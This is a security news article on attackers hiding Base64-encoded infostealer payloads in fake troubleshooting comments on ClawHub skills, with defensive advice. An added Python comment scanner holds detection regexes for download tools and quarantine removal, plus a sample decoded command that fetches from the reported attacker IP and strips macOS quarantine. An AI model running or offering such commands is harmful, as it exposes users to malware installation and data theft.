PROBABLYPWNED
Malware | February 24, 2026 | 3 min read

Attackers Weaponize ClawHub Comments to Deliver Infostealers

Threat actors bypass ClawHub security by hiding Base64 payloads in fake troubleshooting comments. Atomic Stealer delivered to unsuspecting OpenClaw users.

James Rivera

The AI agent ecosystem can't catch a break. Researchers at OpenGuardrails discovered attackers are now posting malicious comments on legitimate ClawHub skills to deliver the Atomic macOS (AMOS) infostealer—a technique that sidesteps the platform's existing security scanning entirely.

This marks the third distinct attack vector targeting OpenClaw users this month. We covered the 341 malicious skills distributing Atomic Stealer three weeks ago, and researchers documented Vidar infostealer targeting OpenClaw configuration files shortly after. Now attackers don't even need to publish malicious skills—they just leave poisoned comments on popular legitimate ones.

Attack Mechanism

The operation targets comments on popular, trusted skills for services like Trello, Slack, and other productivity tools. Attackers post what appear to be helpful troubleshooting suggestions—the kind of community support users expect in a skill repository.

The "fix" contains Base64-encoded text. When decoded and executed, the payload:

  1. Downloads a shellcode loader from infrastructure at 91.92.242.30
  2. Removes macOS quarantine attributes to bypass Gatekeeper protections
  3. Delivers and executes the Atomic macOS (AMOS) infostealer

The attack works because ClawHub's security scanning analyzes skill packages, not user comments. As the OpenGuardrails team noted: "This payload was delivered as encoded text inside a comment, which significantly reduced the likelihood of detection by users and security scanners."

Technical Indicators

Indicator          | Value
Malware Family     | Atomic Stealer (AMOS)
Delivery Method    | Base64-encoded comment text
Infrastructure IP  | 91.92.242.30
Target Platform    | macOS

The infrastructure at 91.92.242.30 was previously linked to the ClawHavoc campaign that distributed malicious skills—suggesting the same operators are behind this comment-based technique.

Why Comment-Based Attacks Work

ClawHub follows a model similar to GitHub Issues or npm package discussions: comments are community-driven and largely unmoderated. The platform's security focus centers on skill packages themselves, which undergo VirusTotal scanning before publication.

But text comments bypass that entirely. A Base64 blob looks like gibberish to casual observers but decodes trivially. Users troubleshooting a legitimate skill installation might follow "helpful" advice without recognizing the danger.
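
A comment-side check for the scanning gap described above, as an added example (not ClawHub or OpenGuardrails code): it decodes Base64-looking runs in comment text and matches the decoded text against indicators. The IP is the one reported in this article; the regexes, thresholds, function names and sample comments are assumptions constructed for illustration.

```python
import base64
import binascii
import re

# Runs of 24+ Base64-alphabet characters, with optional padding (assumed threshold).
B64_RUN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")

# The IP is the one reported in the article; the other patterns are assumptions.
INDICATORS = {
    "known_infrastructure": re.compile(r"91\.92\.242\.30"),
    "quarantine_removal": re.compile(r"xattr\b.*com\.apple\.quarantine"),
    "download_tool": re.compile(r"\b(?:curl|wget)\b"),
}

def decode_candidates(comment):
    """Yield readable text decoded from Base64-looking runs in a comment."""
    for match in B64_RUN.finditer(comment):
        blob = match.group(0).rstrip("=")
        blob += "=" * (-len(blob) % 4)  # tolerate stripped padding
        try:
            raw = base64.b64decode(blob, validate=True)
        except (binascii.Error, ValueError):
            continue  # not valid Base64 after all
        text = raw.decode("utf-8", errors="ignore")
        readable = sum(c.isprintable() or c.isspace() for c in text)
        if readable / len(raw) > 0.9:  # skip runs that decode to binary noise
            yield text

def scan_comment(comment):
    """Return the sorted indicator names found in decoded comment content."""
    hits = set()
    for text in decode_candidates(comment):
        hits.update(n for n, rx in INDICATORS.items() if rx.search(text))
    return sorted(hits)

# Constructed sample input: a non-functional stand-in for the decoded "fix".
SAMPLE_DECODED = ("curl http://91.92.242.30/PLACEHOLDER ; "
                  "xattr -d com.apple.quarantine PLACEHOLDER")
SAMPLE_COMMENTS = [
    "Thanks, the Trello skill works after re-authenticating.",
    "Same error here, this fixed it for me: "
    + base64.b64encode(SAMPLE_DECODED.encode()).decode(),
]

if __name__ == "__main__":
    for comment in SAMPLE_COMMENTS:
        print(scan_comment(comment) or "clean", "<-", comment[:40])
```

A check like this only covers single-layer Base64; a decoded result with no indicator hits is not evidence that a comment is safe.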

Broader AI Agent Security Concerns

The rapid adoption of AI agents like OpenClaw creates new attack surfaces that security tooling hasn't caught up with. These agents run with significant system privileges—reading files, executing commands, making network requests—and extend capabilities through third-party "skills" that users install with minimal vetting.

Traditional browser extension security models don't translate directly. When an AI agent can execute shell commands on your behalf, the stakes of a malicious extension are far higher than a rogue browser add-on stealing cookies.

For security teams evaluating AI agent adoption, consider:

  • Skill vetting processes beyond automated scanning
  • Sandboxing agent execution environments where possible
  • Network monitoring for connections to unexpected infrastructure
  • User education about social engineering tactics in technical communities

Recommendations for OpenClaw Users

Be skeptical of troubleshooting advice in ClawHub comments, especially suggestions involving Terminal commands or encoded text. If a skill isn't working, check the official documentation or repository issues rather than following anonymous comment suggestions.

Report suspicious comments to ClawHub moderators so the posting accounts can be banned. The platform's response to this campaign will indicate whether comment moderation becomes a security priority.
